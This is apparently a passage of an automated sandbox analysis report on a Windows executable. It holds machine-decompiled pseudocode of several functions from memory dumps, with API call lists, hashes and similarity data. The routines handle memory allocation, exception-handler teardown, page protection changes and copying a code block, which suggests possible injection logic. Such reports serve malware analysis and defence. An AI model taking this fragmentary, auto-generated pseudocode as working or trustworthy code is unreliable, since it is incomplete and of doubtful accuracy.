                                                                                                                                                                        					E004033A3(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                        					_t46 = 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v12 = _t44;
                                                                                                                                                                        					_v8 = _a12;
                                                                                                                                                                        					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                        					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                        					_t80 =  *(_t66 + 8);
                                                                                                                                                                        					_t49 = E0040345D(_t66);
                                                                                                                                                                        					_t99 = _t96 + 4;
                                                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                                                        						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						while(_t86 != 0xffffffff) {
                                                                                                                                                                        							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                        							if(_t53 == 0) {
                                                                                                                                                                        								L8:
                                                                                                                                                                        								_t80 =  *(_t66 + 8);
                                                                                                                                                                        								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                        								continue;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t54 =  *_t53();
                                                                                                                                                                        								_t89 = _t89;
                                                                                                                                                                        								_t86 = _t86;
                                                                                                                                                                        								_t66 = _a8;
                                                                                                                                                                        								_t55 = _t54;
                                                                                                                                                                        								_t106 = _t54;
                                                                                                                                                                        								if(_t106 == 0) {
                                                                                                                                                                        									goto L8;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									if(_t106 < 0) {
                                                                                                                                                                        										_t46 = 0;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t82 =  *(_t66 + 8);
                                                                                                                                                                        										E00403348(_t55, _t66);
                                                                                                                                                                        										_t89 = _t66 + 0x10;
                                                                                                                                                                        										E004033A3(_t89, _t66, 0);
                                                                                                                                                                        										_t99 = _t99 + 0xc;
                                                                                                                                                                        										E0040343F(_t82[2]);
                                                                                                                                                                        										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                        										_t66 = 0;
                                                                                                                                                                        										_t86 = 0;
                                                                                                                                                                        										 *(_t82[2])(1);
                                                                                                                                                                        										goto L8;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L13;
                                                                                                                                                                        						}
                                                                                                                                                                        						L11:
                                                                                                                                                                        						_t46 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				L13:
                                                                                                                                                                        				return _t46;
                                                                                                                                                                        			}
























                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                        • Instruction ID: 312ed2b9e062c6c4493c59e2ff7240bd31bc6bcbdb0b7b24eb198fdd60d09ece
                                                                                                                                                                        • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                        • Instruction Fuzzy Hash: F72195729002049FCB10EF69C8C1867BBA9FF45350B4581BDED55AB285DB34FA15C7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429066587.0000000000435000.00000040.00020000.sdmp, Offset: 00435000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
                                                                                                                                                                        • Instruction ID: e09fce20fe5d081cba04c7b23c1baab397c5943f7bd07877f57794798176e9be
                                                                                                                                                                        • Opcode Fuzzy Hash: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
                                                                                                                                                                        • Instruction Fuzzy Hash: A4117F733405009FD754DE55DC91EA7B3AAEB98320B29806AED09CB315E679EC42C660
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429106240.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
                                                                                                                                                                        • Instruction ID: 26e947844db9c2102a2130967bf71fe51fd30975e68f604cd91a796c8575b322
                                                                                                                                                                        • Opcode Fuzzy Hash: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
                                                                                                                                                                        • Instruction Fuzzy Hash: F21181733406049FD754DE59DC81FA2B3AAFB89330B298066ED04CB355E676EC41CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                                                        			E004031F0(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				void* _t19;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        
                                                                                                                                                                        				_push(E00403244);
                                                                                                                                                                        				_push( *[fs:0x0]);
                                                                                                                                                                        				 *((intOrPtr*)(_t20 + 0x10)) = _t18;
                                                                                                                                                                        				_t19 = _t20 + 0x10;
                                                                                                                                                                        				_t4 = _t19 - 8; // 0xe8000000
                                                                                                                                                                        				 *((intOrPtr*)(_t19 - 0x18)) = _t20 -  *((intOrPtr*)(_t20 + 0x10));
                                                                                                                                                                        				_push( *_t4);
                                                                                                                                                                        				_t6 = _t19 - 4; // 0xfffffeaf
                                                                                                                                                                        				 *((intOrPtr*)(_t19 - 4)) = 0xffffffff;
                                                                                                                                                                        				 *((intOrPtr*)(_t19 - 8)) =  *_t6;
                                                                                                                                                                        				_t9 = _t19 - 0x10; // 0x4019b4
                                                                                                                                                                        				_t14 = _t9;
                                                                                                                                                                        				 *[fs:0x0] = _t14;
                                                                                                                                                                        				return _t14;
                                                                                                                                                                        			}








                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c4e65263c7c737316429b8658bc66cae97caeb7c030ae1029cd6c8ea9ba39084
                                                                                                                                                                        • Instruction ID: 66cb2a37692255b115f6a6b852887c2011cefdec4cff22543c71a71db66972f1
                                                                                                                                                                        • Opcode Fuzzy Hash: c4e65263c7c737316429b8658bc66cae97caeb7c030ae1029cd6c8ea9ba39084
                                                                                                                                                                        • Instruction Fuzzy Hash: 33E075B5944789EFCB10DF99C981B9EFBF8FB45610F100A5AF465D3640D3349A048B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00402844(signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                        				long _v4;
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				long _v20;
                                                                                                                                                                        				long _v24;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                        				char* _t42;
                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                        				void* _t52;
                                                                                                                                                                        				long _t53;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 2;
                                                                                                                                                                        				E004013B6(_t52, _a4, 0, 0,  &_v8);
                                                                                                                                                                        				_t53 = _v24;
                                                                                                                                                                        				_v20 = _t53;
                                                                                                                                                                        				_t56 = VirtualAlloc(0, _t53, 0x3000, 4);
                                                                                                                                                                        				if(_t56 == 0) {
                                                                                                                                                                        					L15:
                                                                                                                                                                        					_v12 = 8;
                                                                                                                                                                        					L16:
                                                                                                                                                                        					if(_t56 != 0) {
                                                                                                                                                                        						VirtualFree(_t56, 0, 0x8000);
                                                                                                                                                                        					}
                                                                                                                                                                        					return _v12;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t37 = E004013B6(_t52, _a4, _t56, _t53,  &_v8);
                                                                                                                                                                        					_t53 = _v24;
                                                                                                                                                                        					if(_t37 != 0 || _v4 >= _t53) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v4 = _t53;
                                                                                                                                                                        					VirtualFree(_t56, 0, 0x8000);
                                                                                                                                                                        					_t56 = VirtualAlloc(0, _t53, 0x3000, 4);
                                                                                                                                                                        					if(_t56 != 0) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					break;
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t56 == 0 || _v4 < _t53) {
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_a4 = _a4 & 0x00000000;
                                                                                                                                                                        					_t14 = _t56 + 8; // 0x8
                                                                                                                                                                        					_t54 = _t14;
                                                                                                                                                                        					if( *_t56 <= 0) {
                                                                                                                                                                        						goto L16;
                                                                                                                                                                        					}
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t48 = ( *(_t54 + 0x1e) & 0x0000ffff) + _t54 + 0x20;
                                                                                                                                                                        						if(lstrcmpiA(_t48, 0x406000) == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t42 = StrChrA(_t48, 0x2e);
                                                                                                                                                                        						if(_t42 == 0) {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_t54 = _t54 + 0x120;
                                                                                                                                                                        							_v0 = _v0 + 1;
                                                                                                                                                                        							if(_v0 <  *_t56) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *_t42 = 0;
                                                                                                                                                                        						if(lstrcmpiA(_t48, 0x406000) == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t40 = _a8;
                                                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                                                        					 *_t40 =  *((intOrPtr*)(_t54 + 8));
                                                                                                                                                                        					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t54 + 0xc));
                                                                                                                                                                        					_t41 = _a12;
                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                        						 *_t41 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L16;
                                                                                                                                                                        				}
                                                                                                                                                                        			}



















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004013B6: GetProcAddress.KERNEL32(00406064,00000318), ref: 004013D4
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0040287D
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402963
                                                                                                                                                                          • Part of subcall function 004013B6: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 0040155A
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,00000000), ref: 004028B3
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004028BF
                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,00406000,?,00000000,00000000,00000000), ref: 004028F6
                                                                                                                                                                        • StrChrA.SHLWAPI(?,0000002E), ref: 004028FF
                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,00406000), ref: 00402912
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$AllocFreelstrcmpi$AddressProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1783538721-0
                                                                                                                                                                        • Opcode ID: 491aa70b1e6a50617f5bb26c7dacaca1a4cdc38919a48f016d1c3607e8ff063f
                                                                                                                                                                        • Instruction ID: 4abcd7ef27afaf1c5cc54e1fc4d0b567ca84e4e590f6a38dfb5881ad5b9a84d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 491aa70b1e6a50617f5bb26c7dacaca1a4cdc38919a48f016d1c3607e8ff063f
                                                                                                                                                                        • Instruction Fuzzy Hash: D93193B1605312ABD321DF11CE48F6BBBE8EF84754F11052AFA84B62D1D774D904CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E004015D2(void* __esi) {
                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                        				long _t10;
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				intOrPtr* _t19;
                                                                                                                                                                        				intOrPtr* _t20;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				intOrPtr* _t23;
                                                                                                                                                                        				struct _CRITICAL_SECTION* _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        
                                                                                                                                                                        				_t22 = __esi;
                                                                                                                                                                        				_t25 =  *(_t26 + 0xc);
                                                                                                                                                                        				_t9 =  *((intOrPtr*)(_t25 + 0x20));
                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                        					__imp__RemoveVectoredExceptionHandler(_t9);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t10 =  *(_t25 + 0x24);
                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                        					TlsFree(_t10);
                                                                                                                                                                        				}
                                                                                                                                                                        				if( *_t25 != 0) {
                                                                                                                                                                        					DeleteCriticalSection(_t25);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t19 = _t25 + 0x18;
                                                                                                                                                                        				_t21 =  *_t19;
                                                                                                                                                                        				if(_t21 != _t19) {
                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t23 = _t21;
                                                                                                                                                                        						_t12 =  *_t23;
                                                                                                                                                                        						_t20 =  *((intOrPtr*)(_t23 + 4));
                                                                                                                                                                        						_t21 =  *_t21;
                                                                                                                                                                        						 *_t20 = _t12;
                                                                                                                                                                        						 *((intOrPtr*)(_t12 + 4)) = _t20;
                                                                                                                                                                        						_t7 = _t23 + 0xc; // 0xc
                                                                                                                                                                        						VirtualProtect( *(_t23 + 8) << 0xc, 1,  *_t7, _t7);
                                                                                                                                                                        						E00401759(_t23);
                                                                                                                                                                        					} while (_t21 != _t19);
                                                                                                                                                                        				}
                                                                                                                                                                        				return E00401759(_t25);
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        • RemoveVectoredExceptionHandler.KERNEL32(?,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004015E1
                                                                                                                                                                        • TlsFree.KERNEL32(?,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004015EF
                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004015FC
                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000001,0000000C,0000000C,00000000,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000), ref: 00401629
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalDeleteExceptionFreeHandlerProtectRemoveSectionVectoredVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2089334682-0
                                                                                                                                                                        • Opcode ID: ad1a18a86c5e1e2e706b0896db7b4887fb8789d1de7905578f361f352baa916e
                                                                                                                                                                        • Instruction ID: abcb594cb904f911564d6ee301b284767340d68b6534243a15feff00a902482c
                                                                                                                                                                        • Opcode Fuzzy Hash: ad1a18a86c5e1e2e706b0896db7b4887fb8789d1de7905578f361f352baa916e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B015EB6200204AFD7109F54DC88E9B77ACFF88315B04842AFA56B7360D739EC40CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 41%
                                                                                                                                                                        			E00401152(void* __ecx, intOrPtr __edx, intOrPtr* __esi, void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                        				intOrPtr _v984;
                                                                                                                                                                        				intOrPtr _v988;
                                                                                                                                                                        				signed int _v1112;
                                                                                                                                                                        				intOrPtr _v1116;
                                                                                                                                                                        				intOrPtr _v1188;
                                                                                                                                                                        				void _v1228;
                                                                                                                                                                        				int _v1232;
                                                                                                                                                                        				char _v1236;
                                                                                                                                                                        				char _v1240;
                                                                                                                                                                        				intOrPtr _v1248;
                                                                                                                                                                        				intOrPtr _v1252;
                                                                                                                                                                        				intOrPtr _v1256;
                                                                                                                                                                        				intOrPtr _v1260;
                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                        				char* _t42;
                                                                                                                                                                        				long _t50;
                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                        				intOrPtr* _t66;
                                                                                                                                                                        				intOrPtr* _t68;
                                                                                                                                                                        
                                                                                                                                                                        				_t68 = __esi;
                                                                                                                                                                        				_t64 = __edx;
                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                        				_t59 = _a4;
                                                                                                                                                                        				_v1236 = 0;
                                                                                                                                                                        				_v1232 = 0;
                                                                                                                                                                        				memset( &_v1228, 0, 0x4c8);
                                                                                                                                                                        				_t66 = E0040176E(_t64);
                                                                                                                                                                        				_t5 = _t68 + 0x218; // 0x218
                                                                                                                                                                        				_v1188 = 0x100003;
                                                                                                                                                                        				memcpy(_t5, E004031BD, 0x100);
                                                                                                                                                                        				_t41 = E004018E5(_t61,  *_t59);
                                                                                                                                                                        				_v1260 = _t41;
                                                                                                                                                                        				if(_t41 != 0) {
                                                                                                                                                                        					_t42 =  &_v1236;
                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                        					_push(_t64);
                                                                                                                                                                        					_push(_t42);
                                                                                                                                                                        					_v1252 = _t42;
                                                                                                                                                                        					_v1248 = _t64;
                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                        					_push(_t64);
                                                                                                                                                                        					_push( *((intOrPtr*)(_t59 + 4)));
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(2);
                                                                                                                                                                        					_push( *((intOrPtr*)(_t66 + 4)));
                                                                                                                                                                        					_push( *_t66);
                                                                                                                                                                        					if(E00403150() >= 0) {
                                                                                                                                                                        						_t14 = _t68 + 0x18; // 0x18
                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                        						if( *((intOrPtr*)(__esi + 0x10)) == _t14 &&  *((intOrPtr*)(__esi + 0x14)) == _t64) {
                                                                                                                                                                        							asm("adc ecx, ecx");
                                                                                                                                                                        							 *((intOrPtr*)(__esi + 0x10)) = _v1256 + 0x18;
                                                                                                                                                                        							 *((intOrPtr*)(__esi + 0x14)) = 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *_t68 = _v988;
                                                                                                                                                                        						 *((intOrPtr*)(_t68 + 4)) = _v984;
                                                                                                                                                                        						if(E004012A3( *_t59, _v1256, _t68,  &_v1240) == 0) {
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t51 = _v1256;
                                                                                                                                                                        							_push(_v1248);
                                                                                                                                                                        							_v1112 = _v1112 & 0x00000000;
                                                                                                                                                                        							_push(_v1252);
                                                                                                                                                                        							_v1116 = _t51;
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							_v988 = _t51 + 0x218;
                                                                                                                                                                        							_v984 = _t64;
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							_push(_t64);
                                                                                                                                                                        							_push( *((intOrPtr*)(_t59 + 4)));
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(2);
                                                                                                                                                                        							_push( *((intOrPtr*)(_t66 + 0xc)));
                                                                                                                                                                        							_push( *((intOrPtr*)(_t66 + 8)));
                                                                                                                                                                        							if(E00403150() < 0) {
                                                                                                                                                                        								goto L3;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t50 = 0;
                                                                                                                                                                        								goto L10;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t50 = 5;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t50 = GetLastError();
                                                                                                                                                                        					L10:
                                                                                                                                                                        					if(_t50 == 0xffffffff) {
                                                                                                                                                                        						L11:
                                                                                                                                                                        						_t50 = GetLastError();
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t50;
                                                                                                                                                                        			}

























                                                                                                                                                                        0x0040127b
                                                                                                                                                                        0x00401288
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040128e
                                                                                                                                                                        0x0040128e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040128e
                                                                                                                                                                        0x00401288
                                                                                                                                                                        0x004011ec
                                                                                                                                                                        0x004011ec
                                                                                                                                                                        0x004011ee
                                                                                                                                                                        0x004011ee
                                                                                                                                                                        0x004011b7
                                                                                                                                                                        0x004011b7
                                                                                                                                                                        0x00401290
                                                                                                                                                                        0x00401293
                                                                                                                                                                        0x00401295
                                                                                                                                                                        0x00401295
                                                                                                                                                                        0x00401295
                                                                                                                                                                        0x00401293
                                                                                                                                                                        0x004012a0

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.NTDLL ref: 00401178
                                                                                                                                                                        • memcpy.NTDLL ref: 004011A0
                                                                                                                                                                          • Part of subcall function 004018E5: RtlNtStatusToDosError.NTDLL ref: 0040191D
                                                                                                                                                                          • Part of subcall function 004018E5: SetLastError.KERNEL32(00000000), ref: 00401924
                                                                                                                                                                        • GetLastError.KERNEL32(00000010,00000218,004031BD,00000100,?,00000318,00000008), ref: 004011B7
                                                                                                                                                                        • GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,004031BD,00000100), ref: 00401295
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$Last$Statusmemcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1706616652-0
                                                                                                                                                                        • Opcode ID: f52de296993238569345912b85dd29c3a6ffa61b8c8323f45adde6a9320c95d8
                                                                                                                                                                        • Instruction ID: 44a939ea81b67d67490989cc1a91529b0d2f81242c3b803bceb4247962c2a2bf
                                                                                                                                                                        • Opcode Fuzzy Hash: f52de296993238569345912b85dd29c3a6ffa61b8c8323f45adde6a9320c95d8
                                                                                                                                                                        • Instruction Fuzzy Hash: C04183B1504301AFD720DF69DD41FABBBE9BB88314F00493EF599E62A0E734D9148B66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%